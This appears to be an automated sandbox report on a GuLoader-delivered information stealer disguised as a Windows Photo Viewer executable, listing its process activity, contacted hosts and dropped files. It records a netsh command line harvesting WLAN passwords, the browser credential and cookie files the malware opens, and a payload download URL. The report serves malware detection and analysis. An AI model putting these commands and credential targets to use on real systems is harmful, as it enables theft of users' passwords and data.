            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe VolumeInformation
            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected PXRECVOWEIWOEI Stealer
            Source: Yara matchFile source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal WLAN passwords
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key3.db
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
            Source: Yara matchFile source: 00000012.00000002.2217463796.0000000024FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected PXRECVOWEIWOEI Stealer
            Source: Yara matchFile source: 00000012.00000002.2217463796.000000002526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2217463796.0000000025265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
            Windows Management Instrumentation            		1
            Registry Run Keys / Startup Folder            		111
            Process Injection            		11
            Masquerading            		1
            OS Credential Dumping            		25
            Security Software Discovery            		Remote Services1
            Data from Local System            		2
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		1
            Modify Registry            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)1
            DLL Side-Loading            		11
            Disable or Modify Tools            		Security Account Manager171
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook171
            Virtualization/Sandbox Evasion            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Process Injection            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync53
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe8%ReversingLabsWin32.Trojan.GuLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crowninter.com/jAscfKcoNcxeCpbJ57.bin0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            whatismyipaddressnow.co
            		104.21.71.78
            		truefalse
              		unknown
              crowninter.com
              		174.142.247.185
              		truefalse
                		unknown
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high
                  icanhazip.com
                  		104.16.185.241
                  		truefalse
                    		high
                    169.241.9.0.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://crowninter.com/jAscfKcoNcxeCpbJ57.binfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://icanhazip.com/false
                        		high
                        http://ip-api.com/line/?fields=hostingfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUSfalse
                          174.142.247.185
                          		crowninter.comCanada
                          		32613IWEB-ASCAfalse
                          23.221.242.90
                          		unknownUnited States
                          		8612TISCALI-ITfalse
                          104.16.185.241
                          		icanhazip.comUnited States
                          		13335CLOUDFLARENETUSfalse
                          104.21.71.78
                          		whatismyipaddressnow.coUnited States
                          		13335CLOUDFLARENETUSfalse

                          Private

                          IP
                          127.0.0.1

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1430487
                          Start date and time:2024-04-23 18:04:53 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:31
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@54/21@5/39
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded IPs from analysis (whitelisted): 23.221.242.90
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: file.exe

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe5740021, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.7864532229988107
                          Encrypted:false
                          SSDEEP:
                          MD5:6601A1B69DF7285DE1CFD02D02D1409F
                          SHA1:CE51EB94BAA3B52AC5ACC73AD643CF697BD24425
                          SHA-256:33BB6AE81704C0FEC08CB99354BD106A289550B9E9C3CA6D6CA7FAC80F5DCB3D
                          SHA-512:8359DA598D4A7E6F8D55B99756024803BD1FC49A4594D7F75BA0CF22868985A8465C521E2079E49F7B970782D4225117F2AAC3220704E59B4F62627FE031B3B9
                          Malicious:false
                          Reputation:unknown
                          Preview:.t.!... ...............X\...;...{......................0.z...... ...{.......|}.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.....................................u.....|.;................e.a`.....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):8003
                          Entropy (8bit):4.838950934453595
                          Encrypted:false
                          SSDEEP:
                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvwfq23h.o4c.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:unknown
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\sp4c0p22.default-release\cert9.db

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):229376
                          Entropy (8bit):0.6434285179750744
                          Encrypted:false
                          SSDEEP:
                          MD5:CA2638E4884BBF9BF114A2362BDF7166
                          SHA1:6C7D4FBE6FD32EDD6B9246D42C03EAF9B0444677
                          SHA-256:3DA02AD760D44C75B4B4768E246C6C6FA60330AB0B2D155C9A9F21E3F65613C1
                          SHA-512:AAAA94AA819B3628C7DAEF6309C0C795215B8FADE93003C48C4D570B3B58E31B5312D3FD94799C6216E138CA41A04CF5E0CB45D99EDF2C4864195398783030B9
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\sp4c0p22.default-release\key4.db

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):294912
                          Entropy (8bit):0.08428064428500968
                          Encrypted:false
                          SSDEEP:
                          MD5:BDD416B4CDA202FBECDA64E322383E0A
                          SHA1:9648E083239C643A03D024CF42D06FEBCCFC3989
                          SHA-256:7EF6BD5E3293949D174DBC2BFD59E9DEE3811CE5B01BAB894A8E0AA4BA6DE936
                          SHA-512:D75E0D4B239844293C9CE4980F9FC1665247EF6F21C0D6D4B299F29A5A3800AD44E9B0B1D5FF5BC9CB3EB86F6394D1AA7F86845A54FC4B8A937CDF5DA619324F
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp2F6E.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):5242880
                          Entropy (8bit):0.037864444196155034
                          Encrypted:false
                          SSDEEP:
                          MD5:B612FC06C34BEEBCC6EA05BDE1DCC9F4
                          SHA1:1F08BDF75A2CBC40FD342A24D99A7075648C431D
                          SHA-256:79F8BB304FA31A232F0BDA8B07B9CB87C58EBF67085B88077C2C73554E31C2C2
                          SHA-512:7AB95F0AB92A5A518D1D5920E4F8E9CEEA55DD9B3FDE9B844D37558F1EDD83ADB58177B07E508DA0A211787BD2B8ABFCDA907E7FBB0C44B957292DC549C86B73
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp315D.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                          Category:dropped
                          Size (bytes):98304
                          Entropy (8bit):0.08235737944063153
                          Encrypted:false
                          SSDEEP:
                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp5C61.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                          Category:dropped
                          Size (bytes):20480
                          Entropy (8bit):0.6732424250451717
                          Encrypted:false
                          SSDEEP:
                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp.dat

                          Download File
                          Process:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                          Category:dropped
                          Size (bytes):20480
